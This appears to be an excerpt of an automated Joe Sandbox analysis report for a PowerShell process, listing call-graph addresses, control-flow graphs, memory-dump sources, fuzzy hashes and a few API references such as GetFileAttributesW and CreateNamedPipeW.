112698->112693 112699->112693 112700->112693 112701->112693 112703 898962e 112702->112703 112704 8989a11 112703->112704 112706 898aa08 GetFileAttributesW 112703->112706 112749 898a9f8 112703->112749 112754 898aae0 112703->112754 112704->112673 112706->112703 112710 898968f 112708->112710 112709 8989a11 112709->112673 112710->112709 112711 898a9f8 GetFileAttributesW 112710->112711 112712 898aa08 GetFileAttributesW 112710->112712 112713 898aae0 GetFileAttributesW 112710->112713 112711->112710 112712->112710 112713->112710 112715 89894ac 112714->112715 112718 898d728 GetFileAttributesW 112715->112718 112719 898d989 GetFileAttributesW 112715->112719 112720 898d6d0 GetFileAttributesW 112715->112720 112721 898d6c0 GetFileAttributesW 112715->112721 112716 8989624 112717 8989a11 112716->112717 112722 898a9f8 GetFileAttributesW 112716->112722 112723 898aa08 GetFileAttributesW 112716->112723 112724 898aae0 GetFileAttributesW 112716->112724 112717->112673 112718->112716 112719->112716 112720->112716 112721->112716 112722->112716 112723->112716 112724->112716 112726 898968f 112725->112726 112727 8989a11 112726->112727 112728 898a9f8 GetFileAttributesW 112726->112728 112729 898aa08 GetFileAttributesW 112726->112729 112730 898aae0 GetFileAttributesW 112726->112730 112727->112673 112728->112726 112729->112726 112730->112726 112732 898968f 112731->112732 112733 8989a11 112732->112733 112734 898a9f8 GetFileAttributesW 112732->112734 112735 898aa08 GetFileAttributesW 112732->112735 112736 898aae0 GetFileAttributesW 112732->112736 112733->112673 112734->112732 112735->112732 112736->112732 112738 898968f 112737->112738 112739 8989a11 112738->112739 112740 898a9f8 GetFileAttributesW 112738->112740 112741 898aa08 GetFileAttributesW 112738->112741 112742 898aae0 GetFileAttributesW 112738->112742 112739->112673 112740->112738 112741->112738 112742->112738 112745 898968f 112743->112745 112744 8989a11 112744->112673 112745->112743 112745->112744 112746 898a9f8 GetFileAttributesW 112745->112746 112747 898aa08 GetFileAttributesW 112745->112747 112748 898aae0 GetFileAttributesW 112745->112748 112746->112745 112747->112745 112748->112745 112751 898aa1e 112749->112751 112750 898aa8a 112750->112703 112751->112750 112752 898a488 GetFileAttributesW 112751->112752 112753 898a478 GetFileAttributesW 112751->112753 112752->112750 112753->112750 112755 898ab15 112754->112755 112756 898ab76 112754->112756 112755->112756 112757 898a488 GetFileAttributesW 112755->112757 112758 898a478 GetFileAttributesW 112755->112758 112756->112703 112757->112756 112758->112756 112420 89d6000 112421 89d602e 112420->112421 112422 89d600c 112420->112422 112422->112421 112423 89d5a18 GetFileAttributesW 112422->112423 112424 89d5a58 GetFileAttributesW 112422->112424 112423->112422 112424->112422 112428 81511a8 112430 81511d1 112428->112430 112429 8151355 112429->112429 112430->112429 112432 81517b2 112430->112432 112433 8151771 112432->112433 112434 81517b7 112432->112434 112433->112430 112435 8151abd 112434->112435 112438 8988e67 112434->112438 112446 8988e78 112434->112446 112435->112430 112439 8988e78 112438->112439 112453 4d15018 112439->112453 112461 4d15078 112439->112461 112440 8988e92 112441 8988e98 112440->112441 112444 8988e78 GetFileAttributesW 112440->112444 112445 8988e67 GetFileAttributesW 112440->112445 112441->112434 112444->112441 112445->112441 112451 4d15078 GetFileAttributesW 112446->112451 112452 4d15018 GetFileAttributesW 112446->112452 112447 8988e92 112448 8988e98 112447->112448 112449 8988e78 GetFileAttributesW 112447->112449 112450 8988e67 GetFileAttributesW 112447->112450 112448->112434 112449->112448 112450->112448 112451->112447 112452->112447 112454 4d1501c 112453->112454 112459 4d15078 GetFileAttributesW 112454->112459 112460 4d15018 GetFileAttributesW 112454->112460 112455 4d15042 112456 4d15048 112455->112456 112467 4d148e8 112455->112467 112456->112440 112459->112455 112460->112455 112463 4d15090 112461->112463 112462 4d150a5 112462->112440 112463->112462 112464 4d150c0 112463->112464 112465 4d148e8 GetFileAttributesW 112463->112465 112464->112440 112466 4d150d6 112465->112466 112466->112440 112468 4d154c0 GetFileAttributesW 112467->112468 112470 4d150d6 112468->112470 112470->112440

                            Executed Functions

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1109 89febd0-89febf5 1111 89febfb-89fec41 1109->1111 1112 89fee11-89fee28 1109->1112 1125 89fec57-89fec71 1111->1125 1126 89fec43-89fec55 1111->1126 1117 89fee2f-89fee89 1112->1117 1131 89fee8f-89fee9e 1117->1131 1132 89fefb4-89fefb7 1117->1132 1125->1117 1136 89fec77-89fec81 1125->1136 1135 89fec89-89fed38 1126->1135 1131->1132 1141 89feea4-89feea9 1131->1141 1138 89fefbf-89fefd0 1132->1138 1212 89fed3a-89fed40 1135->1212 1213 89fed85-89fed89 1135->1213 1136->1135 1148 89ff01e-89ff02d 1138->1148 1149 89fefd2-89fefd7 1138->1149 1142 89feeab-89feeb1 1141->1142 1143 89feec1-89feed9 1141->1143 1146 89feeb5-89feebf 1142->1146 1147 89feeb3 1142->1147 1143->1132 1162 89feedf-89feef2 1143->1162 1146->1143 1147->1143 1160 89ff02f-89ff035 1148->1160 1161 89ff045-89ff076 1148->1161 1151 89fefef-89ff01d 1149->1151 1152 89fefd9-89fefdf 1149->1152 1153 89fefe3-89fefed 1152->1153 1154 89fefe1 1152->1154 1153->1151 1154->1151 1165 89ff039-89ff03b 1160->1165 1166 89ff037 1160->1166 1162->1132 1175 89feef8-89fef07 1162->1175 1165->1161 1166->1161 1175->1132 1180 89fef0d-89fef12 1175->1180 1181 89fef2a-89fef3e 1180->1181 1182 89fef14-89fef1a 1180->1182 1181->1132 1188 89fef40-89fef44 1181->1188 1184 89fef1e-89fef28 1182->1184 1185 89fef1c 1182->1185 1184->1181 1185->1181 1190 89fef4a-89fef65 1188->1190 1191 89ff077-89ff0ac 1188->1191 1198 89fef88-89fef8d 1190->1198 1199 89fef67-89fef74 1190->1199 1201 89ff0ae-89ff0bf 1191->1201 1202 89ff0c7-89ff184 1191->1202 1203 89fef8f-89fef95 1198->1203 1204 89fefa5-89fefb3 1198->1204 1199->1132 1215 89fef76-89fef87 1199->1215 1201->1202 1211 89ff0c1-89ff0c6 1201->1211 1251 89ff186-89ff197 1202->1251 1252 89ff1f3-89ff1f7 1202->1252 1206 89fef99-89fefa3 1203->1206 1207 89fef97 1203->1207 1206->1204 1207->1204 1216 89fed58-89fed83 1212->1216 1217 89fed42-89fed48 1212->1217 1220 89fed8b-89fed98 1213->1220 1221 89fed9a-89feda9 1213->1221 1216->1212 1216->1213 1222 89fed4c-89fed56 1217->1222 1223 89fed4a 1217->1223 1229 89fedab-89fedb7 1220->1229 1221->1229 1222->1216 1223->1216 1234 89fedb9-89fedc6 1229->1234 1235 89fedc8-89fedd7 1229->1235 1240 89fedd9-89fedea 1234->1240 1235->1240 1244 89fedff-89fee0e 1240->1244 1245 89fedec-89fedfd 1240->1245 1245->1244 1259 89ff199-89ff1a0 1251->1259 1260 89ff1a2-89ff1ba 1251->1260 1253 89ff1f9-89ff1fd 1252->1253 1254 89ff230-89ff23d 1252->1254 1256 89ff1ff-89ff212 1253->1256 1257 89ff226-89ff22d 1253->1257 1262 89ff241-89ff247 1254->1262 1264 89ff21a-89ff21e 1256->1264 1259->1252 1268 89ff1bc-89ff1c3 1260->1268 1269 89ff1c5-89ff1dd 1260->1269 1267 89ff249-89ff290 1262->1267 1264->1257 1267->1262 1281 89ff292-89ff298 1267->1281 1268->1252 1275 89ff1df-89ff1ea 1269->1275 1276 89ff1ec 1269->1276 1275->1252 1276->1252 1281->1267 1282 89ff29a-89ff2b5 1281->1282
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: ,tm$,tm$4'pm$4'pm$Ld@l$Ld@l$p`pm$p`pm$$pm$$pm$$pm$$pm
                            • API String ID: 0-4140540224
                            • Opcode ID: 59ccba5123d055b6cf46e7944206c7c8e86f7040663948a94b5d779929173471
                            • Instruction ID: 3481160ddf4bd7eb16bd61b3379ea234906e2fe4b0f1d41aff29639e33721264
                            • Opcode Fuzzy Hash: 59ccba5123d055b6cf46e7944206c7c8e86f7040663948a94b5d779929173471
                            • Instruction Fuzzy Hash: 5322B730B002458FCB18DF74C854AAE7BB6AF89319B148479D606DB3A5DF34EC45CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: "Gl$"Gl
                            • API String ID: 0-3290586065
                            • Opcode ID: e7e5e6fe287618bd289d797ca9ed66b40bf878ccdaaf8aea5fbead6cf00595f0
                            • Instruction ID: 898b7bc821b0be1bfee4150f61f265a4ae6067459dad240bd69205ae6617c2bf
                            • Opcode Fuzzy Hash: e7e5e6fe287618bd289d797ca9ed66b40bf878ccdaaf8aea5fbead6cf00595f0
                            • Instruction Fuzzy Hash: A7524A34B002548FCB54DF68C954BAEBBF6AF88305F1085A9E50AEB355DB34AD81CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.16429850508.0000000008150000.00000040.00000010.sdmp, Offset: 08150000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8150000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `Qpm
                            • API String ID: 0-1797261451
                            • Opcode ID: 823e7333a3e13d3777f54387abc09ee935dca7c8b12461ea57bc39cff8c058e7
                            • Instruction ID: d1efc2399d355212978a15502a0998fd691c9744e71eba462c3645b45bd72c18
                            • Opcode Fuzzy Hash: 823e7333a3e13d3777f54387abc09ee935dca7c8b12461ea57bc39cff8c058e7
                            • Instruction Fuzzy Hash: 39429C30A00209DFDB16DF64C894BAEBBB2FF84305F4185A9ED15AB395EB35D981CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateNamedPipeW.KERNELBASE(?,?,?,?,?,?,00000001,00000000), ref: 081C3218
                            Memory Dump Source
                            • Source File: 00000009.00000002.16430637457.00000000081C0000.00000040.00000001.sdmp, Offset: 081C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_81c0000_powershell.jbxd
                            Similarity
                            • API ID: CreateNamedPipe
                            • String ID:
                            • API String ID: 2489174969-0
                            • Opcode ID: eae1d42e01d7250929a8e887c15348d9c00414230fefe8440ae99b08a0a5003a
                            • Instruction ID: f7c7d4a7d00fbda8f1c7e7fbc71edfc58f51ff81a7d22818cdd7058b69b2f904
                            • Opcode Fuzzy Hash: eae1d42e01d7250929a8e887c15348d9c00414230fefe8440ae99b08a0a5003a
                            • Instruction Fuzzy Hash: 9BC1BE70E002089FDB14DFA9C854BEEBBF6EF88704F14842DE905AB391DB749945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.16429850508.0000000008150000.00000040.00000010.sdmp, Offset: 08150000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8150000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (tm
                            • API String ID: 0-8316014
                            • Opcode ID: cfebcf8bd397f90d911c4dc578b683392f6cfd9519c2502eb5c809583884bdb7
                            • Instruction ID: e26e76e1ced1508f018703fced95e5864c9de9272d701e1a58329feaa39307de
                            • Opcode Fuzzy Hash: cfebcf8bd397f90d911c4dc578b683392f6cfd9519c2502eb5c809583884bdb7
                            • Instruction Fuzzy Hash: 9E229F71A00609DFDB14DF68C844A9EB7F6FF85305F1489A9E816AB360DB70ED46CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16436535667.0000000008980000.00000040.00000001.sdmp, Offset: 08980000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8980000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 604125e7166da464b4a2a4964e91ed243015c67cc43189b6523f177a2edd0c40
                            • Instruction ID: 75d2599c639f487c278a74e89d59e630dfd05ef560b4cf0b738f18fd614066b7
                            • Opcode Fuzzy Hash: 604125e7166da464b4a2a4964e91ed243015c67cc43189b6523f177a2edd0c40
                            • Instruction Fuzzy Hash: 1592AD30A04205CFCB15EFA8D454AAE7BB6EF8930AF14846DE8069B395DF35DC46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16429850508.0000000008150000.00000040.00000010.sdmp, Offset: 08150000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8150000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1757d27bb61977e12e1e66741a2b452d977d02ca95094990b85eb100a610ed02
                            • Instruction ID: a12040b832e7a1b21e55621d3a1f1719587a3a19f6bfaf8168cadabbf8d59e01
                            • Opcode Fuzzy Hash: 1757d27bb61977e12e1e66741a2b452d977d02ca95094990b85eb100a610ed02
                            • Instruction Fuzzy Hash: 2922AF30B10208DFCB15DF68C445AAEBBE6EF85345F148868E8169B365DF74ED06CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16436535667.0000000008980000.00000040.00000001.sdmp, Offset: 08980000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8980000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1aa770242c0d30d92d4d10dd624821af67e1181d2a676d75ea07a48b04010238
                            • Instruction ID: 633ab2a9ec77f84e3e79d87d7f0e76c43b95bc4b858da519f35096ec0e2830fa
                            • Opcode Fuzzy Hash: 1aa770242c0d30d92d4d10dd624821af67e1181d2a676d75ea07a48b04010238
                            • Instruction Fuzzy Hash: 9002C070A04216CFDB24EF65C944BAEBBEAAF8430AF14896EE405DB291DB74DC41CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000009.00000002.16436535667.0000000008980000.00000040.00000001.sdmp, Offset: 08980000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8980000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b62c5753ec7a08313942633fda3a1b3cc3ba2c2e29b823dba006febb744ff606
                            • Instruction ID: 02a46bd9930fb7efd0975eb4f690ee0454226b2bc72250e7ad3ee6e0a3c07b71
                            • Opcode Fuzzy Hash: b62c5753ec7a08313942633fda3a1b3cc3ba2c2e29b823dba006febb744ff606
                            • Instruction Fuzzy Hash: B9E17F74B00205CFCB05EF68C854AAEBBF6BF88345F148469E9059B3A5CB78DD45CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1284 89f95c0-89f9647 1292 89f966f-89f9691 1284->1292 1293 89f9649-89f9658 1284->1293 1299 89f970b-89f970f 1292->1299 1300 89f9693-89f96a2 1292->1300 1293->1292 1296 89f965a-89f9667 1293->1296 1296->1292 1301 89f9796-89f97bc 1299->1301 1302 89f9715-89f9726 1299->1302 1300->1299 1306 89f96a4-89f96b5 1300->1306 1313 89f97be-89f97fb 1301->1313 1307 89f973b-89f974e 1302->1307 1308 89f9728-89f9739 1302->1308 1314 89f96b7-89f96cf 1306->1314 1315 89f96d4-89f96e4 1306->1315 1317 89f977d 1307->1317 1318 89f9750-89f9763 1307->1318 1316 89f9780-89f9794 1308->1316 1339 89f97fd-89f9814 1313->1339 1340 89f9872-89f9890 1313->1340 1332 89f9b83-89f9b96 1314->1332 1323 89f96fc-89f9706 1315->1323 1324 89f96e6-89f96ec 1315->1324 1316->1313 1317->1316 1329 89f977b 1318->1329 1330 89f9765-89f976b 1318->1330 1323->1332 1327 89f96ee 1324->1327 1328 89f96f0-89f96f2 1324->1328 1327->1323 1328->1323 1329->1317 1333 89f976f-89f9771 1330->1333 1334 89f976d 1330->1334 1333->1329 1334->1329 1421 89f9817 call 89df3c1 1339->1421 1422 89f9817 call 89df3d0 1339->1422 1343 89f98cf-89f98db 1340->1343 1344 89f9892-89f98a6 1340->1344 1350 89f9961-89f996e 1343->1350 1351 89f98e1-89f98fd 1343->1351 1354 89f98af-89f98cd 1344->1354 1355 89f98a8 1344->1355 1345 89f981a-89f981c 1347 89f981e-89f9824 1345->1347 1348 89f9834-89f9870 1345->1348 1352 89f9828-89f982a 1347->1352 1353 89f9826 1347->1353 1348->1339 1348->1340 1356 89f99ad-89f99b9 1350->1356 1357 89f9970-89f9984 1350->1357 1362 89f98ff-89f9916 1351->1362 1363 89f9945-89f995c 1351->1363 1352->1348 1353->1348 1354->1343 1355->1354 1367 89f9a1d-89f9a2c 1356->1367 1368 89f99bb-89f99c8 1356->1368 1369 89f998d-89f99ab 1357->1369 1370 89f9986 1357->1370 1377 89f991f-89f9943 1362->1377 1378 89f9918 1362->1378 1383 89f9a32-89f9a36 1363->1383 1367->1383 1373 89f99ca-89f99de 1368->1373 1374 89f9a07-89f9a1b 1368->1374 1369->1356 1370->1369 1388 89f99e7-89f9a05 1373->1388 1389 89f99e0 1373->1389 1374->1383 1377->1363 1378->1377 1386 89f9a6d-89f9ac2 1383->1386 1387 89f9a38-89f9a6a 1383->1387 1406 89f9ac4-89f9adf 1386->1406 1407 89f9ae1-89f9af6 1386->1407 1387->1386 1388->1374 1389->1388 1410 89f9afc-89f9b7c 1406->1410 1407->1410 1410->1332 1421->1345 1422->1345
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: "Gl$"Gl$4'pm$Ld@l$Ld@l$Ld@l$Ld@l$Ld@l$Ld@l$[
                            • API String ID: 0-860386212
                            • Opcode ID: 0ecd57f3e0f32f2627c13c1874ad5c509c3b8e197abd7fc501edfa8bb8111635
                            • Instruction ID: b0ef4a2799422e79396d95712ed45f3b3485cb2fac9f190f1ae1acf3ef70d10a
                            • Opcode Fuzzy Hash: 0ecd57f3e0f32f2627c13c1874ad5c509c3b8e197abd7fc501edfa8bb8111635
                            • Instruction Fuzzy Hash: 97022234B002048FC754EBA8C995AAEBBF6AF88355F144538E906AB355DF74EC06CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1423 89fe818-89fe84c 1427 89fe84e-89fe866 1423->1427 1428 89fe86b-89fe882 1423->1428 1433 89fea63-89fea6a 1427->1433 1434 89fe889-89fe8b5 1428->1434 1435 89fe884 1428->1435 1438 89fe8b7-89fe8d1 1434->1438 1439 89fe900-89fe90c 1434->1439 1435->1433 1444 89fe8da-89fe8fe 1438->1444 1445 89fe8d3 1438->1445 1442 89fe90e-89fe91b 1439->1442 1443 89fe937 1439->1443 1448 89fe91d-89fe935 1442->1448 1449 89fe93c-89fe96c 1442->1449 1443->1433 1444->1439 1445->1444 1448->1443 1448->1449 1457 89fe96e-89fe97b 1449->1457 1458 89fe9c2-89fe9d2 1449->1458 1457->1458 1464 89fe97d-89fe995 1457->1464 1459 89fea17-89fea2e 1458->1459 1460 89fe9d4-89fe9eb 1458->1460 1470 89fea54-89fea58 1459->1470 1471 89fea30-89fea45 1459->1471 1465 89fe9ed 1460->1465 1466 89fe9f4-89fea15 1460->1466 1464->1458 1475 89fe997-89fe9ac 1464->1475 1465->1466 1466->1459 1470->1433 1473 89fea5a-89fea61 1470->1473 1477 89fea6b-89feaa2 1471->1477 1478 89fea47-89fea52 1471->1478 1473->1433 1475->1477 1481 89fe9b2-89fe9bd 1475->1481 1485 89feaa4-89feab2 1477->1485 1486 89feaf1-89feaff 1477->1486 1478->1433 1481->1433 1491 89feac5-89feacc 1485->1491 1492 89feab4-89feac0 1485->1492 1489 89feb5d-89feb6b 1486->1489 1490 89feb01-89feb0f 1486->1490 1497 89feb6d-89feb78 1489->1497 1498 89feba2-89febaa 1489->1498 1499 89feb27-89feb38 1490->1499 1500 89feb11-89feb17 1490->1500 1522 89feacf call 89df490 1491->1522 1523 89feacf call 89df480 1491->1523 1501 89febb2-89febb6 1492->1501 1496 89fead2-89fead4 1502 89feaec 1496->1502 1503 89fead6-89feadc 1496->1503 1497->1498 1512 89feb7a-89feb80 1497->1512 1498->1501 1510 89feb3a-89feb57 1499->1510 1511 89feb59-89feb5b 1499->1511 1506 89feb1b-89feb1d 1500->1506 1507 89feb19 1500->1507 1502->1501 1504 89feade 1503->1504 1505 89feae0-89feae2 1503->1505 1504->1502 1505->1502 1506->1499 1507->1499 1510->1511 1511->1501 1520 89feb83 call 89df221 1512->1520 1521 89feb83 call 89df230 1512->1521 1514 89feb86-89feb88 1515 89feb8a-89feb90 1514->1515 1516 89feba0 1514->1516 1517 89feb94-89feb96 1515->1517 1518 89feb92 1515->1518 1516->1501 1517->1516 1518->1516 1520->1514 1521->1514 1522->1496 1523->1496
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: Ld@l$Ld@l$Ld@l$Ld@l$Ld@l$Ld@l$!um
                            • API String ID: 0-1571545934
                            • Opcode ID: a9f7124dc1e2deffbeceffe9935931387058784830fc14716369c192c84149e3
                            • Instruction ID: eb4037747bd4cae246e85048529286ca63ea96d3ffe12ad7a3d8fd7c05d52b3e
                            • Opcode Fuzzy Hash: a9f7124dc1e2deffbeceffe9935931387058784830fc14716369c192c84149e3
                            • Instruction Fuzzy Hash: 51B180307042058FCB18EF69C494AAE7BEABF89619B0544B9E506CF372DB71DC41CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1667 89f91a0-89f91d4 1671 89f91da-89f91fb 1667->1671 1672 89f9330-89f9353 1667->1672 1677 89f91fe-89f9219 1671->1677 1679 89f9359-89f9375 1672->1679 1680 89f94a0-89f94a9 1672->1680 1684 89f921b-89f922a 1677->1684 1685 89f9252-89f9268 1677->1685 1679->1680 1688 89f937b-89f938b 1679->1688 1690 89f922c-89f9232 1684->1690 1691 89f9242-89f924d 1684->1691 1692 89f926a-89f926d 1685->1692 1693 89f9270-89f927f 1685->1693 1698 89f938d-89f9393 1688->1698 1699 89f93a3-89f93bb 1688->1699 1694 89f9236-89f9238 1690->1694 1695 89f9234 1690->1695 1705 89f931e-89f932a 1691->1705 1692->1693 1701 89f9288-89f92b0 1693->1701 1702 89f9281-89f9285 1693->1702 1694->1691 1695->1691 1703 89f9397-89f9399 1698->1703 1704 89f9395 1698->1704 1699->1680 1710 89f93c1-89f93f0 1699->1710 1741 89f92b2 call 89f8ecf 1701->1741 1742 89f92b2 call 89f8f30 1701->1742 1743 89f92b2 call 89f8f40 1701->1743 1702->1701 1703->1699 1704->1699 1705->1672 1705->1677 1710->1680 1724 89f93f6-89f9425 1710->1724 1713 89f92b8-89f92d5 1718 89f92d7-89f92e0 1713->1718 1719 89f92e2-89f92e5 1713->1719 1720 89f92eb-89f92ef 1718->1720 1719->1720 1722 89f92fc-89f92ff 1720->1722 1723 89f92f1-89f92fa 1720->1723 1725 89f9305-89f9316 1722->1725 1723->1725 1724->1680 1731 89f9427-89f949e 1724->1731 1725->1705 1731->1680 1741->1713 1742->1713 1743->1713
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: "Gl$"Gl$4'pm$4'pm$Ld@l$Ld@l
                            • API String ID: 0-1116740274
                            • Opcode ID: a4281ec484a612bffca97a748cf5ee0240b37f0d67cf6b8b2a2628f8f748fced
                            • Instruction ID: d47da750b01fb21aa08522e710ac79a99b003b7fd40d0fe5ef5feb4307ca4ff4
                            • Opcode Fuzzy Hash: a4281ec484a612bffca97a748cf5ee0240b37f0d67cf6b8b2a2628f8f748fced
                            • Instruction Fuzzy Hash: 4E912F34B002048FC748EFA4D894AAEBBFAEFC9315B148468D90ADB395DF359C41CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2082 898a488-898a4ac 2083 898a4bd 2082->2083 2084 898a4ae-898a4bb 2082->2084 2085 898a4c2-898a4c4 2083->2085 2084->2085 2086 898a4ca-898a4d9 2085->2086 2087 898a8c3-898a92c 2085->2087 2086->2087 2090 898a4df-898a4e1 2086->2090 2100 898a9af-898a9bd 2087->2100 2101 898a932-898a948 2087->2101 2091 898a4e9-898a534 2090->2091 2092 898a4e3 2090->2092 2179 898a536 call 8989ef8 2091->2179 2180 898a536 call 8989f08 2091->2180 2092->2091 2105 898a9ca-898a9f3 2100->2105 2106 898a9bf-898a9c7 2100->2106 2177 898a94b call 898a488 2101->2177 2178 898a94b call 898a478 2101->2178 2107 898a53c-898a563 2113 898a574 2107->2113 2114 898a565-898a572 2107->2114 2108 898a94e-898a951 2108->2100 2108->2106 2115 898a579-898a57b 2113->2115 2114->2115 2116 898a8ac-898a8b6 2115->2116 2117 898a581-898a597 2115->2117 2119 898a5a8-898a5bd 2117->2119 2120 898a599-898a5a6 2117->2120 2123 898a5ce-898a5dd 2119->2123 2124 898a5bf-898a5cc 2119->2124 2120->2119 2123->2116 2127 898a5e3-898a5f7 2123->2127 2124->2123 2129 898a5f9-898a607 2127->2129 2130 898a61c-898a627 2127->2130 2129->2130 2133 898a609-898a619 2129->2133 2134 898a629-898a635 2130->2134 2135 898a63a-898a652 2130->2135 2133->2130 2134->2116 2139 898a660 2135->2139 2140 898a654-898a65e 2135->2140 2141 898a665-898a667 2139->2141 2140->2141 2142 898a669-898a8c0 2141->2142 2143 898a674-898a692 2141->2143 2147 898a6a4-898a6ae 2143->2147 2148 898a694-898a6a2 2143->2148 2151 898a6b0-898a6b2 2147->2151 2148->2147 2148->2151 2152 898a6c4-898a72b 2151->2152 2153 898a6b4-898a6c2 2151->2153 2152->2116 2153->2152 2156 898a730-898a74e 2153->2156 2161 898a76c-898a7d2 2156->2161 2162 898a750-898a767 2156->2162 2161->2116 2162->2116 2177->2108 2178->2108 2179->2107 2180->2107
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.16436535667.0000000008980000.00000040.00000001.sdmp, Offset: 08980000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_8980000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4<Gl$Htm$l8Gl$l8Gl
                            • API String ID: 0-3767182861
                            • Opcode ID: 2c4893659226c9e793ed2a4d78c0a58cf478095931c3226d7204363de6827e8e
                            • Instruction ID: 1c93ddc23a36e010b98d525ebbec72b59d71db275ff2a1d43b4222a4e9a1f8b8
                            • Opcode Fuzzy Hash: 2c4893659226c9e793ed2a4d78c0a58cf478095931c3226d7204363de6827e8e
                            • Instruction Fuzzy Hash: 66D17E70B04215CFCB14EFB8D454AAEBBF6AF88215F14846AE901EB390DB35DC46CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3083 89d6820-89d68c1 3096 89d68cf-89d68f0 3083->3096 3097 89d68c3-89d68c6 3083->3097 3100 89d6911-89d691a 3096->3100 3101 89d68f2-89d690a 3096->3101 3097->3096 3144 89d691d call 89fa398 3100->3144 3145 89d691d call 89fa3a8 3100->3145 3101->3100 3103 89d6923-89d6975 3111 89d6987-89d69a5 3103->3111 3112 89d6977-89d6985 3103->3112 3115 89d69ea-89d69f6 3111->3115 3116 89d69a7-89d69be 3111->3116 3112->3111 3117 89d69fc-89d6bfb 3112->3117 3115->3117 3121 89d69c7-89d69e8 3116->3121 3122 89d69c0 3116->3122 3121->3115 3122->3121 3144->3103 3145->3103
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: "Gl$^Gl$^Gl
                            • API String ID: 0-1084755145
                            • Opcode ID: 346faf11fdebff5be7b435af08b3e5b1d1c588164f9605567d10b20a48a83d3c
                            • Instruction ID: ce8fc4e6f2628e3a94c03849f922c61e4f98f93316e41960d3198fe8e0b80383
                            • Opcode Fuzzy Hash: 346faf11fdebff5be7b435af08b3e5b1d1c588164f9605567d10b20a48a83d3c
                            • Instruction Fuzzy Hash: BE919030B002459FDB05EF74C851AEEBBB6AFC9304F148528E906AB395DF35AD06CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
